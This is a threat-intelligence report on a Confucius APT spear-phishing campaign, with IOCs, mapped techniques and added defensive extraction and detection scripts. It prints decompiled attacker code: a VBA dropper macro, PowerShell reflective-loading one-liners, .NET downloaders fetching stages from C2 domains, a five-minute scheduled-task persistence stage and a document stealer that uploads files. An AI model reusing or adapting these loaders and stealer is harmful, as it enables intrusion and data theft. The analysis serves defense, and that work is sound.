Published: Tue 26 Oct, 21
Acknowledgements: Dr. Farrukh Shahzad
Background
Confucius, an Indian state-sponsored APT group, continues to target defense and government organizations in South Asia, especially Pakistan. The threat actor's primary purpose appears to be running espionage campaigns and stealing information critical to the operations of the targeted institutions.
In August 2021, the release of Amnesty International's advisory on the Pegasus spyware sold by Israel's NSO Group caused major unrest among the country's politicians and other high-profile individuals. Capitalizing on this unrest, Confucius began luring such individuals with a two-part email exchange: the first email was a plain informational message about defending against Pegasus, and the second carried an encrypted document, with the document's password stated in the body of that same email. Technical analysis of the document and of the entire attack chain points to a well-planned espionage campaign, a new development for Confucius.
In late September 2021 the same campaign was re-run; the only changes we observed were the domains used for payload acquisition and data exfiltration. The flow of the whole attack chain is shown below:

Figure 1: Execution flow of complete attack chain
Reports of a potential intrusion by Confucius were first disclosed by researchers on Twitter. Analysis of the campaign by our researchers is discussed in detail in the following sections:
Macro-enabled Word Document
Confucius relies heavily on Microsoft Word documents attached to spear-phishing emails to reach its targets. Previously, these documents carried external relationships to malicious templates (template injection). More recently, the group appears to have switched to malicious VBA macros.
From the Document_Open handler, the macro calls two procedures: one that writes the embedded binary to disk (and then loads it) and one that updates the caption of an image embedded in the document. The procedure Mycolor reads the value of the document's built-in Comments property, opens a handle to a file in the Temp directory, and writes the data to disk after converting it from its text encoding to binary via the macro's own abc routine (not shown in the snippet).
Sub Mycolor()
    Dim prop As DocumentProperty
    ' Pull the encoded payload out of the document's built-in Comments property
    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            s = prop.Value
        End If
    Next
    ' Decode it (abc is the macro's own text-to-binary routine, defined elsewhere) and drop it to %TMP%\skfk.txt
    fnum = FreeFile
    FName = Environ("TMP") & "\skfk.txt"
    Open FName For Binary As #fnum
    Put #fnum, , abc(CStr(s))
    Close #fnum
    ' Load the dropped .NET assembly via reflection from a hidden PowerShell window and call Tysdf.Class1.sadkj
    fr = "'" & Environ("TMP") & "\skfk.txt" & "'"
    Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
    CreateObject("WScript.Shell").Run Result, 0, True
End Sub
Snippet 1: VBA Macros Embedded Inside Lure
Once written, the binary is loaded into memory from PowerShell through the .NET Reflection API, specifically the static LoadFile method of System.Reflection.Assembly, which takes a single parameter: the path of the assembly to load. An object of Tysdf.Class1 is then instantiated and its sadkj procedure is called.
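A lure built this way can be triaged without opening the document, because the payload sits in the package metadata rather than in the macro. The following is an added example written for this page (not code from the report, and not the actor's macro): Word stores the built-in Comments property as dc:description in docProps/core.xml, so the script reads that element out of the .docm zip and converts it back to bytes. The report does not show the macro's abc converter, so the text-to-binary step is an assumption: the script tries hex and base64 and accepts a candidate only if it begins with the MZ signature. The document it builds for the demonstration is constructed and carries a stub DOS/PE header, not a real assembly.

```python
"""Recover the .NET DLL that the macro keeps in the DOCM's Comments property.

Added triage example, not code from the original report or the malware.
Word's built-in "Comments" property is stored as <dc:description> in
docProps/core.xml, so it can be read straight from the OOXML zip.
The macro's abc() text-to-binary routine is not shown in the report, so the
encoding is an ASSUMPTION: hex and base64 are tried and a candidate is
accepted only if it starts with the PE 'MZ' signature.
"""
import base64
import binascii
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Optional

DC_NS = "http://purl.org/dc/elements/1.1/"
CP_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"


def read_comments_property(docm_bytes: bytes) -> str:
    """Return the raw text of the built-in Comments property ('' if absent)."""
    with zipfile.ZipFile(io.BytesIO(docm_bytes)) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
    node = root.find(f"{{{DC_NS}}}description")
    return (node.text or "") if node is not None else ""


def decode_candidate(text: str) -> Optional[bytes]:
    """Try the assumed encodings; return the blob only if it looks like a PE."""
    cleaned = "".join(text.split())  # the property value may be line-wrapped
    decoders = (binascii.unhexlify, lambda s: base64.b64decode(s, validate=True))
    for decode in decoders:
        try:
            blob = decode(cleaned)
        except (binascii.Error, ValueError):
            continue
        if blob[:2] == b"MZ":
            return blob
    return None


def extract_payload(docm_bytes: bytes) -> Optional[bytes]:
    """Full chain: zip -> core.xml -> dc:description -> decoded PE bytes."""
    return decode_candidate(read_comments_property(docm_bytes))


def build_sample_docm(payload: bytes, encoding: str = "hex") -> bytes:
    """Constructed test input: a minimal OOXML zip whose core.xml carries the
    encoded payload in dc:description, the way the lure's Comments property does."""
    encoded = payload.hex() if encoding == "hex" else base64.b64encode(payload).decode()
    core_xml = (
        f'<cp:coreProperties xmlns:cp="{CP_NS}" xmlns:dc="{DC_NS}">'
        f"<dc:title>Ticket</dc:title><dc:description>{encoded}</dc:description>"
        "</cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/core.xml", core_xml)
        z.writestr("word/document.xml", "<document/>")  # placeholder, never parsed
    return buf.getvalue()


# Constructed stand-in for the dropped DLL: DOS header with e_lfanew = 0x80 and a
# PE signature at that offset. It is not a real assembly.
FAKE_PE = b"MZ" + b"\x90" * 58 + (0x80).to_bytes(4, "little") + b"\x00" * 64 + b"PE\x00\x00"

if __name__ == "__main__":
    blob = extract_payload(build_sample_docm(FAKE_PE))
    print(f"recovered {len(blob)} bytes; bytes at 0x80: {blob[0x80:0x84]!r}")
```

On a real sample, replace build_sample_docm with the bytes of the .docm and hash the returned blob against the IOC table; if neither decoder yields an MZ header, the actor has changed the encoding and abc must be read out of the macro itself.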
.NET Downloader/Loader
Static analysis of the binary shows that it is a dynamic-link library (.NET assembly) whose compile timestamp has been modified to point to the year 2050. Rather than doing the download itself, sadkj spawns a second, hidden powershell.exe process that reloads the same DLL, instantiates another Tysdf.Class1 object and calls its sdlfghjgks method, after which the current process exits.
// Entry point called by the macro's PowerShell one-liner (Tysdf.Class1.sadkj)
public void sadkj()
{
    string str = Path.GetTempPath() + "skfk.txt";   // the DLL the macro dropped, i.e. this same file
    // Re-launch a hidden PowerShell that reloads this assembly and calls the downloader routine,
    // so the network stage runs in a fresh process rather than the one Word spawned
    new Process
    {
        StartInfo =
        {
            FileName = "powershell.exe",
            Arguments = "[Reflection.Assembly]::LoadFile('" + str + "');$t = New-Object Tysdf.Class1;$t.sdlfghjgks()",
            WindowStyle = ProcessWindowStyle.Hidden
        }
    }.Start();
    Environment.Exit(0);   // terminate the first PowerShell instance
}
Snippet 2: .NET Loader
sdlfghjgks is the interesting part: it references a URL on the C2 infrastructure from which it fetches what looks like another DLL masquerading as a .TXT file. In summary, the function downloads the .TXT file from the domain inshaaldom.xyz, converts the ASCII-encoded payload to binary via the moon function, loads the resulting assembly directly from memory with Assembly.Load, enumerates its types, instantiates each of them and dynamically invokes the ndmsbfl method of the newly acquired assembly.
// Downloader: fetch the next stage (the scheduler DLL, served as text) and run it from memory
public void sdlfghjgks()
{
    WebClient webClient = new WebClient();
    string uriString = "https://inshaaldom.xyz/SowpnTdb.txt";   // DLL masquerading as .txt
    try
    {
        string sweiorut = webClient.DownloadString(new Uri(uriString));
        // moon() turns the ASCII-encoded body back into PE bytes; Assembly.Load keeps them off disk
        Type[] types = Assembly.Load(this.moon(sweiorut)).GetTypes();
        for (int i = 0; i < types.Length; i++)
        {
            object arg = Activator.CreateInstance(types[i]);
            // Decompiled C# 'dynamic' call site: the runtime binder invokes ndmsbfl() on the instance by name
            if (Class1.<>o__3.<>p__0 == null)
            {
                Class1.<>o__3.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "ndmsbfl", null, typeof(Class1), new CSharpArgumentInfo[]
                {
                    CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
                }));
            ...
}
Snippet 3: Payload Acquisition and Dynamic Invocation of Scheduler
.NET Task Scheduler
Static analysis of SowpnTdb.txt (a DLL) turned up some interesting strings. The embedded PDB path F:\Hacking Notes - Documents\Projects\project-05\SowpnTdb\SowpnTdb\bin\Release\ILMerge\SowpnTdb.pdb (seen in one of the intrusions from the campaign) suggests that several projects were lined up to continue the attack campaign; the ILMerge directory in the path is consistent with a helper library having been merged into the DLL. Several metadata fields of the binary identified it as a Task Scheduler, likely taken from GitHub. Reconnaissance on GitHub pointed to a .NET wrapper for the Windows Task Scheduler API that is a direct match for the code base used by the scheduler (the TaskService, TimeTrigger and ExecAction types in the decompiled code below come from that wrapper). This highlights the fact that Confucius uses open-source projects in its operations; we have previously identified similar use of open-source tools (OSTs) by its (potential) sister group, SideWinder.
Analysis of the ndmsbfl method shows that it downloads another DLL from the payload-acquisition domain of that run (parinari.xyz in the snippet below; inshaaldom.xyz in the other run) and drops it to C:\ProgramData as jksdfhk.txt. It then registers a scheduled task named Systemcheck that runs a PowerShell command every five minutes. The scheduled command is the same dynamic-invocation pattern covered earlier, using the Reflection API to load the freshly dropped DLL.
// Scheduler stage: drop the final loader and register a task that re-runs it every five minutes
public void ndmsbfl()
{
    // Msdjkfh.txt is a .NET DLL masquerading as text; it lands under ProgramData as jksdfhk.txt
    new WebClient().DownloadFile(new Uri("https://parinari.xyz/Msdjkfh.txt"), "C:\\ProgramData\\jksdfhk.txt");
    new TaskService();   // result discarded; the singleton TaskService.Instance is used below
    TimeTrigger trigger = new TimeTrigger
    {
        // repeat every 5 minutes with no end to the repetition window
        Repetition = new RepetitionPattern(TimeSpan.FromMinutes(5.0), TimeSpan.FromDays(0.0), false)
    };
    string path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
    // The tripled quotes keep the path as a single quoted string once the task's command line is parsed
    string arguments = "-windowstyle hidden -C $rk = \"\"\"C:\\ProgramData\\jksdfhk.txt\"\"\";[Reflection.Assembly]::LoadFile($rk);$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()\" ";
    // Registered as "Systemcheck" and run under the interactive user's logon token
    TaskService.Instance.AddTask("Systemcheck", trigger, new ExecAction(path, arguments, null), null, null, TaskLogonType.InteractiveToken, null);
}
Snippet 4: .NET Task Scheduler
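The task and the command line it fires are the two most stable artifacts of this chain, since every stage re-uses the same PowerShell one-liner. The following added example (written for this page; not code from the report or from the malware) applies a detection to constructed samples: process command lines shaped like the ones the macro, the loader and the task spawn, and a scheduled-task XML modelled on the Systemcheck task above, in the format Windows stores under C:\Windows\System32\Tasks. The tell is powershell.exe calling [Reflection.Assembly]::LoadFile with a quoted path whose extension is not .dll or .exe, combined with a TimeTrigger that repeats every few minutes; the 15-minute threshold, the user path in the first sample and the XML layout are assumptions of the example.

```python
"""Detect the reflective ".txt" DLL loader one-liner and the Systemcheck task.

Added detection example; not code from the original report or the malware.
It runs on CONSTRUCTED samples only: process command lines shaped like the
ones the macro, the loader and the scheduled task spawn, and a task XML in
the format Windows keeps under C:\\Windows\\System32\\Tasks, modelled on the
Systemcheck task. The masquerading tell is powershell.exe calling
[Reflection.Assembly]::LoadFile on a file not named .dll/.exe; the
persistence tell is a TimeTrigger repeating every few minutes.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
POWERSHELL_RE = re.compile(r"(?:^|\\|\s)powershell(?:\.exe)?\b", re.IGNORECASE)
LOADFILE_RE = re.compile(r"\[Reflection\.Assembly\]::LoadFile\(", re.IGNORECASE)
# Quoted Windows paths; 1-3 quote marks covers 'x', "x" and the """x""" escaping used by the task
QUOTED_PATH_RE = re.compile(r"""['"]{1,3}([A-Za-z]:\\[^'"]+)['"]{1,3}""")
ISO_DURATION_RE = re.compile(r"^PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$")


def is_reflective_txt_load(cmdline: str) -> bool:
    """True when PowerShell reflectively loads an assembly from a non-PE-named file."""
    if not (POWERSHELL_RE.search(cmdline) and LOADFILE_RE.search(cmdline)):
        return False
    return any(not p.lower().endswith((".dll", ".exe")) for p in QUOTED_PATH_RE.findall(cmdline))


def iso_duration_minutes(value: str) -> float:
    """PT5M -> 5.0; unknown or empty -> inf so it never counts as 'short'."""
    m = ISO_DURATION_RE.match(value or "")
    if not m:
        return float("inf")
    h, mi, s = (int(x) if x else 0 for x in m.groups())
    return h * 60 + mi + s / 60


def analyse_task_xml(task_xml: str, max_interval_minutes: int = 15) -> Dict[str, object]:
    """Flag a task whose Exec action is the loader one-liner on a short repetition."""
    root = ET.fromstring(task_xml)
    exec_lines = [
        f"{e.findtext('t:Command', default='', namespaces=TASK_NS)} "
        f"{e.findtext('t:Arguments', default='', namespaces=TASK_NS)}"
        for e in root.findall("t:Actions/t:Exec", TASK_NS)
    ]
    interval = root.findtext("t:Triggers/t:TimeTrigger/t:Repetition/t:Interval", default="", namespaces=TASK_NS)
    reflective = any(is_reflective_txt_load(c) for c in exec_lines)
    return {
        "name": root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=TASK_NS),
        "reflective_loader": reflective,
        "repeat_interval": interval,
        "suspicious": reflective and iso_duration_minutes(interval) <= max_interval_minutes,
    }


def scan_cmdlines(lines: List[str]) -> List[int]:
    """Indices of command lines that match the loader pattern."""
    return [i for i, c in enumerate(lines) if is_reflective_txt_load(c)]


# --- constructed samples (user name and paths made up for the example) ---
SAMPLE_CMDLINES: List[str] = [
    # shape of the command the macro builds
    r"Powershell [Reflection.Assembly]::LoadFile('C:\Users\u\AppData\Local\Temp\skfk.txt');"
    r"$doo = New-Object Tysdf.Class1;$doo.sadkj()",
    # shape of the scheduled task's action
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -C '
    r'$rk = """C:\ProgramData\jksdfhk.txt""";[Reflection.Assembly]::LoadFile($rk);'
    r"$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()",
    # benign: reflective load of a real .dll by an admin script
    r"powershell.exe -c [Reflection.Assembly]::LoadFile('C:\Tools\Helper.dll')",
    # benign: no reflection at all
    r"powershell.exe -NoProfile Get-Process",
]

SAMPLE_TASK_XML = r'''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Systemcheck</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT5M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-windowstyle hidden -C $rk = """C:\ProgramData\jksdfhk.txt""";[Reflection.Assembly]::LoadFile($rk);$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()</Arguments>
  </Exec></Actions>
</Task>'''

if __name__ == "__main__":
    print("cmdline hits:", scan_cmdlines(SAMPLE_CMDLINES))
    print(analyse_task_xml(SAMPLE_TASK_XML))
```

Feed is_reflective_txt_load the CommandLine field of process-creation events (Sysmon Event ID 1 or Security 4688) and analyse_task_xml the files under C:\Windows\System32\Tasks; the extension check is what separates this loader from legitimate scripts that reflectively load a real .dll, and the interval check separates a persistence task from a one-off.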
Final .NET Loader
The final .NET loader performs operations similar to those of the previous loader binaries. In summary, this loader:
- Downloads another payload (Rwlksdnasjd.txt), a DLL masquerading as a TXT file, from the payload-acquisition domain (parinari.xyz in the snippet below; inshaaldom.xyz in the other run)
- Converts the payload from its text encoding to binary (the Houn function) and loads it from memory
- Instantiates the classes found in the newly loaded assembly
- Dynamically invokes the sdsdjkfhds method
// Final loader (Msdjkfh.Class1.Nasuyd), re-executed by the Systemcheck task every five minutes
public void Nasuyd()
{
    WebClient webClient = new WebClient();
    string uriString = "https://parinari.xyz/Rwlksdnasjd.txt";   // the stealer DLL, served as text
    try
    {
        string st = webClient.DownloadString(new Uri(uriString));
        // Houn() is this stage's text-to-binary converter; the stealer is loaded from memory only
        Type[] types = Assembly.Load(this.Houn(st)).GetTypes();
        for (int i = 0; i < types.Length; i++)
        {
            object arg = Activator.CreateInstance(types[i]);
            // Same decompiled 'dynamic' call-site pattern as before, this time invoking sdsdjkfhds()
            if (Class1.<>o__1.<>p__0 == null)
            {
                Class1.<>o__1.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "sdsdjkfhds", null, typeof(Class1), new CSharpArgumentInfo[]
                {
                    CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
                }));
            }
            ...
}
Snippet 5: Final .NET loader
Stealer
Continuing the analysis with the last invoked method, sdsdjkfhds, the metadata of the DLL (Rwlksdnasjd.txt) and several network calls inside it confirm that it is a file stealer and uploader. A snippet of the method is listed below:
// Stealer entry point (Rwlksdnasjd.dll): walk the user profiles and non-system drives, then upload
public void sdsdjkfhds()
{
    string userName = Environment.UserName;
    List<string> pfhl = new List<string>();
    string pattern = "*";
    pfhl = this.Gpufh();   // MD5 list of files already exfiltrated from this host, fetched from the C2
    "C:\\\\Users\\\\" + userName;   // dead statement left behind by the decompiler; result unused
    string tdn = Environment.MachineName + "__" + userName;   // per-victim identifier
    this.CUD(tdn, 0);   // report the victim identifier to the C2
    foreach (string text in Directory.GetDirectories("C:\\Users\\"))
    {
        // Meant to skip the Default and Public profiles, but the '||' makes the condition always true,
        // so every profile directory is searched
        if (text != "C:\\Users\\Default" || text != "C:\\Users\\Public")
        {
            this.GF(text + "\\Documents\\", pattern, "Documents", pfhl);
            this.GF(text + "\\Downloads\\", pattern, "Downloads", pfhl);
            this.GF(text + "\\Desktop\\", pattern, "Desktop", pfhl);
            this.GF(text + "\\Pictures\\", pattern, "Pictures", pfhl);
        }
    }
    // Every drive other than C: (removable media and network mappings included) is searched at its root
    DriveInfo[] drives = DriveInfo.GetDrives();
    char[] trimChars = new char[]
    {
        ':',
        '\\'
    };
    foreach (DriveInfo driveInfo in drives)
    {
        if (driveInfo.Name != "C:\\")
        {
            this.GF(driveInfo.Name, pattern, driveInfo.Name.TrimEnd(trimChars), pfhl);
        }
    }
    Environment.Exit(0);
}
Snippet 6: Stealer and Uploader
Capabilities of the stealer are:
- Enumerate the Documents, Downloads, Desktop and Pictures folders of every profile under C:\Users, plus the root of every drive other than C: (the check intended to skip the Default and Public profiles is always true, so they are searched as well)
- Download a list of MD5 hashes (specific to the machine name and username of the compromised workstation) from the C2 server
- Find and exfiltrate files with the extensions TXT, PDF, PNG, JPG, JPEG, ODS, ODP, ODT, DOC, DOCX, XLS, XLM, XLSX, XLSM, RTF, PPT and PPTX
- Hash each candidate file (MD5) and compare the hash against the list acquired from the C2 server; files that have already been exfiltrated are not uploaded again
// Collect matching files in one folder (top level only), drop already-uploaded ones, then upload the rest
private void GF(string path, string pattern, string ufn, List<string> pfhl)
{
    ...
    try
    {
        list.AddRange(Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly));
        foreach (string text in list)
        {
            ...
            // a holds the 3-character extension, a2 the 4-character one; both spellings are listed for case
            if (a == "txt" || a == "TXT" || a == "pdf" || a == "PDF" || a == "png" || a == "PNG" || a == "jpg" || a == "JPG" || a == "DOC" || a == "doc" || a == "XLS" || a == "xlm" || a == "XLM" || a == "xls" || a == "odp" || a == "ODP" || a == "ods" || a == "ODS" || a == "odt" || a == "ODT" || a == "rtf" || a == "RTF" || a == "ppt" || a == "PPT" || a2 == "xlsx" || a2 == "XLSX" || a2 == "xlsm" || a2 == "XLSM" || a2 == "docx" || a2 == "DOCX" || a2 == "pptx" || a2 == "PPTX" || a2 == "jpeg" || a2 == "JPEG")
            {
                list2.Add(text);
            }
        }
        ...
        foreach (string text3 in list2)
        {
            if (!(text3 == ""))
            {
                string item;
                // MD5 of the file content is the de-duplication key against the C2-supplied list (pfhl)
                using (MD5 md = MD5.Create())
                {
                    using (FileStream fileStream = File.OpenRead(text3))
                    {
                        item = BitConverter.ToString(md.ComputeHash(fileStream)).Replace("-", "");
                    }
                }
                if (!pfhl.Contains(item))   // not uploaded before: queue the file and its hash
                {
                    list3.Add(text3);
                    list4.Add(item);
                }
            }
        }
    }
    if (list3.Count != 0)
    {
        this.CUD(text2, 1);   // upload routine, invoked only when new files were found
        ...
    }
    ...
}
Snippet 7: Capabilities of the Stealer
Although the payload-acquisition domain encrypts its communication with the compromised host (HTTPS), the exfiltration domain, thakithaiya.xyz, uses plain-text HTTP to send and receive data, so the stolen files and the per-victim hash list cross the network unencrypted and are visible to anyone inspecting the traffic. As in earlier Confucius campaigns, the server-side pages are written in PHP, with random URIs and parameter names used to collect the username and machine name. Because the task fires every five minutes, the uploader runs the same routine over and over, collecting any new files from the system, until the task is removed.
Indicators of Compromise
The following Indicators of Compromise were identified during our intrusion analysis:
Files
File Name | Type | Hash
Ticket00073146.docm | MD5 | a91be9529d06cd4a6c06a01b5c595630
Ticket00073146.docm | SHA1 | 814367a04163802d5e124e599772c6a3ba681a78
Ticket00073146.docm | SHA256 | 034cfe57d26cfea4139cf7bb387b9ba8f8705e44d3868e5edc36af0f7a8aa5bf
Tysdf.dll (skfk.txt) | MD5 | ae3e8679df2976d31da858fd7af67185
Tysdf.dll (skfk.txt) | SHA1 | 4c6c04af547b7df04e3bdb3f69e812a30b200016
Tysdf.dll (skfk.txt) | SHA256 | ea7a951dbd93d5ef6ca535820499da29753331e1e8a38c6fef9398a57a679ef0
Msdjkfh.dll (jksdfhk.txt) | MD5 | 5397cbaf89ff40a8b08004ac5164c8a0
Msdjkfh.dll (jksdfhk.txt) | SHA1 | 17f1e33763cb6e5ae6b39f3f28bc695ac597ce7b
Msdjkfh.dll (jksdfhk.txt) | SHA256 | bf50438e10e8ed3eaa7949440a6ac4bdc55305aa2bfe75fa1997feaf0cbc9d50
Rwlksdnasjd.dll (Stealer) | MD5 | 457101ea5c30c53f9381d7e9aa6432a4
Rwlksdnasjd.dll (Stealer) | SHA1 | e554c0ef069fe5a49919bea560003cfccd69f858
Rwlksdnasjd.dll (Stealer) | SHA256 | 43698d70087aa875c4384b59cacd8eff56bd0bff3be20e69b98613ec5184b41f
SowpnTdb.txt (Scheduler) | MD5 | 4461412acfc3988974355d4c1601d3f6
SowpnTdb.txt (Scheduler) | SHA1 | 33596fbe26e556bb2610739f070b66a2cf532eda
SowpnTdb.txt (Scheduler) | SHA256 | 63ca532a13ff909b4b7f72b9a094fa3fc59713984f645664c95a66f14be5f96a
File Paths
File Path | Description |
%Temp%\skfk.txt | .NET DLL dropped by the Word document; used to load the next stage into memory |
C:\ProgramData\jksdfhk.txt | .NET DLL (Msdjkfh.dll) dropped by the scheduler DLL SowpnTdb.txt and re-launched by the Systemcheck task; used to load the final stage into memory |
Scheduled Tasks
Task Name | Task Occurrence |
Systemcheck | Every five minutes |
Domains/IPv4 Addresses
Domain Name | Protocol | Usage | IPv4 Address |
thakithaiya.xyz | HTTP | Exfiltration | 80.209.238.155 |
pirnaram.xyz | HTTP | Exfiltration | 34.98.99.30, 62.77.153.51 |
inshaaldom.xyz | HTTPS | Payload Acquisition | 104.21.10.162, 172.67.146.1 |
parinari.xyz | HTTPS | Payload Acquisition | 34.98.99.30, 104.21.86.125, 172.67.219.211 |
YARA Rules
Yara rules to detect the Loader and Stealer used by Confucius in their recent cyber-espionage campaigns can be found at our GitHub repository.
Tactics, Techniques and Procedures
The following tactics, techniques and procedures are actively used by Confucius in its intrusions:
ID | Name | Description
T1589 | Gather Victim Identity Information | Confucius extensively gathers the victim's identifying information in order to target them with effective lures
T1583 | Acquire Infrastructure | Confucius acquires new infrastructure (discussed in the next techniques) about a month before each new campaign
T1583.001 | Acquire Infrastructure: Domains | Confucius typically registers two new domains as part of its infrastructure: one to serve payloads from and another to exfiltrate data to
T1583.004 | Acquire Infrastructure: Server | Confucius acquires virtual private servers to serve payloads from and to receive exfiltrated data during the Command and Control phase
T1566.001 | Phishing: Spearphishing Attachment | Confucius relies heavily on spear-phishing attachments to compromise its targets. Past emails lured users into opening attachments (often encrypted, with the password stated in the email body) using decoy documents including payrolls, Pegasus (defenses against it) and others
T1053.005 | Scheduled Task/Job: Scheduled Task | Confucius schedules a task on the compromised system to re-execute the malicious payload (every five minutes)
T1036 | Masquerading | The dynamic-link library (.DLL) files Confucius uses to load each subsequent stage are stored on disk and served from the C2 as .TXT (plain-text) files
T1083 | File and Directory Discovery | The final-stage stealer deployed by Confucius extensively searches the file system for particular file extensions and exfiltrates the identified files to the C2 server
T1082 | System Information Discovery | The final-stage stealer also collects information about the compromised system, such as drives, machine name and users, for exfiltration and for later downloading the per-victim hash list used for comparison
T1059.001 | Command and Scripting Interpreter: PowerShell | Confucius relies heavily on the .NET Reflection API, driven from PowerShell, to load and execute its DLLs in memory, leaving a minimal footprint on the compromised system's disk
T1005 | Data from Local System | Confucius collects files from the compromised system in an automated fashion for exfiltration to its server
T1071.001 | Application Layer Protocol: Web Protocols | Confucius operates its command and control servers over the web protocols HTTP and HTTPS
T1573.002 | Encrypted Channel: Asymmetric Cryptography | Confucius uses HTTPS (TLS, whose key exchange relies on asymmetric cryptography) for the payload-acquisition channel; the exfiltration channel to the C2 server, by contrast, runs over plain HTTP
T1041 | Exfiltration Over C2 Channel | Confucius exfiltrates data collected from the compromised system over the C2 channel
T1029 | Scheduled Transfer | The scheduled task also puts the transfer on a schedule: every run exfiltrates newly found files and first acquires the hash list used to exclude files already delivered to Confucius' C2 server
Operational Security Failure
While performing reconnaissance against Confucius' infrastructure, we found a deviation from its normal pattern of operations. Confucius usually buys its C2 domains from the registrar GoDaddy, using a variety of US-based registrant addresses. However, the primary C2 domain in the recent campaign, inshaaldom.xyz, and the C2 domain used in the August 2021 campaign, parinari.xyz, were both registered with an address in Chandigarh, India. We consider this an operational mistake by the operators behind Confucius that reveals their origin.

Figure 2: C2 domain registered in India deviating from usual domain registration pattern of Confucius
Outlook
The techniques Confucius selects are not very sophisticated at the moment, and the group has made some operational security mistakes; however, the analysis of this campaign highlighted the creativity of its operators and their potential to grow more sophisticated in the future.
Previous Confucius campaigns used techniques such as template injection in spear-phishing documents. The current campaign instead uses VBA macros and a text-encoded PE stored in the document's built-in Comments property. These small changes in technique suggest the group is actively adjusting its tradecraft to evade detections based on existing rule sets.